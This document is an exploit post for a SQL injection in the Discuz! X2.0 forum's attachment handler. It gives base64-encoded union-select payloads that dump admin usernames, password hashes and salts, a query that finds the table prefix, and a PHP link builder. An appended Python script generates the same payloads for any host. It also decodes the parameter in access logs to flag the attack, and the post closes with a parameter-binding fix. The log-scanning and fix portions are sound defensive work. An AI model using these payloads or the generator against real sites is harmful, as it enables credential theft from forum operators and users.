Discuz! X2.0 SQL injection vulnerability EXP
Published 2024-02-25 (author: 厚晨菲)
DZ2.0: dump the admin account's username and password directly (when the default table prefix is in use)
/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D
base64-decoded:
1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like 'admin|x|y
If the prefix is not the default one, dump the prefix first.
EXP to dump the table prefix:
/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
base64-decoded:
1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y
———————–
Here is a PHP version of the EXP as well. It prints two links: the first enumerates table names ending in _member to reveal the prefix, the second reads username, password hash and salt for the chosen user. Each aid value is the injection string base64-encoded and then URL-encoded, exactly as in the URLs above.
<?php
// Placeholders: the X2.0 forum base URL and the username whose hash to dump.
$host = "X2.0 forum address";
$affuser = "username to dump";

// Link 1: list table names matching %_member in the current database to learn the prefix.
echo '<a href="';
echo $host."?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y"));
echo '" target="_blank">dump prefix</a>';
echo "<br>";

// Link 2: username|password|salt from pre_ucenter_members (default prefix; change it once link 1 has revealed the real one).
echo '<a href="';
echo $host."?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like '$affuser|x|y"));
echo '" target="_blank">dump password,salt</a>';
?>
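Added example, not part of the original post: a Python script that reproduces the encoding step of the PHP above (base64, then URL-encode) so the same payloads can be generated for any host or query, and, for the defensive side, pulls the aid= value out of web-server access-log lines, decodes it and flags requests whose decoded value reads as SQL. The host name, the log lines and the benign aid value are constructed for the example; the only inputs taken from the writeup are its two payloads. The trailing |x|y is kept verbatim; the assumption here is that the decoded aid value is split on | into several fields, which the post itself does not state.

```python
import base64
import binascii
import re
import urllib.parse

# Endpoint as given in the writeup; the host is a placeholder, not a real site.
ENDPOINT = "?mod=attachment&findpost=ss&aid="
HOST = "http://forum.example"

# First payload exactly as it appears in the writeup (admin username + password hash).
PAGE_AID_1 = ("MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0Mz"
              "Mjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUg"
              "bGlrZSAnYWRtaW58eHx5%3D")
# Second payload (table-prefix discovery) in its decoded form; the trailing |x|y is
# kept verbatim (assumption: the decoded aid is split on '|', injection sits in field 1).
PREFIX_SQL = ("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES "
              "where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y")


def build_aid(sql: str) -> str:
    """Encode an injection string the way the writeup's PHP does: base64, then URL-encode."""
    return urllib.parse.quote(base64.b64encode(sql.encode("utf-8")).decode("ascii"), safe="")


def build_url(host: str, sql: str) -> str:
    """Full attack URL for a given host and injection string."""
    return host + ENDPOINT + build_aid(sql)


def decode_aid(aid_param: str) -> str:
    """Reverse build_aid on a value captured from a request. Tolerates the stray '='
    the writeup's URLs carry and stripped padding; returns '' if it is not base64."""
    raw = urllib.parse.unquote(aid_param).rstrip("=")
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


# A legitimate aid decodes to digits and '|' only; SQL keywords or a quote mean injection.
SQLI_MARKERS = re.compile(r"(?i)\b(union|select|information_schema|group_concat)\b|'")
TABLE_RE = re.compile(r"(?i)\bfrom\s+([A-Za-z0-9_.]+)")
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_aid(aid_param: str):
    """Return (is_injection, decoded_value, table_read_or_None) for one aid= value."""
    decoded = decode_aid(aid_param)
    hit = bool(SQLI_MARKERS.search(decoded))
    m = TABLE_RE.search(decoded)
    return hit, decoded, (m.group(1) if m else None)


def scan_access_log(lines):
    """Return (request_path, decoded_sql, table) for every mod=attachment request
    whose aid= value decodes to SQL. Query strings are split by hand so a raw '+'
    in the base64 is not turned into a space."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        params = {}
        for kv in path.partition("?")[2].split("&"):
            key, _, value = kv.partition("=")
            params[key] = value
        if params.get("mod") != "attachment" or "aid" not in params:
            continue
        is_sqli, decoded, table = classify_aid(params["aid"])
        if is_sqli:
            hits.append((path, decoded, table))
    return hits


# Constructed access-log lines (TEST-NET addresses), not taken from any real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Feb/2024:10:00:01 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 8192',
    '203.0.113.5 - - [25/Feb/2024:10:00:02 +0800] "GET /?mod=attachment&aid=' + build_aid("123|456|789") + ' HTTP/1.1" 200 2048',
    '203.0.113.9 - - [25/Feb/2024:10:00:03 +0800] "GET /' + ENDPOINT + PAGE_AID_1 + ' HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Feb/2024:10:00:04 +0800] "GET /' + ENDPOINT + build_aid(PREFIX_SQL) + ' HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(build_url(HOST, PREFIX_SQL))
    for path, sql, table in scan_access_log(SAMPLE_LOG):
        print(f"SQLi via aid= reading {table}: {sql}")
```

Running it prints the generated prefix-discovery URL and then the two flagged log entries, with the table each payload reads (pre_common_member and INFORMATION_SCHEMA.TABLES). On the application side the only robust fix is to cast the decoded aid to an integer, or bind it as a query parameter, before it reaches the SQL; base64 on the wire is an encoding, not a filter, and the decode step above is all a WAF or log pipeline needs to see the injection in clear.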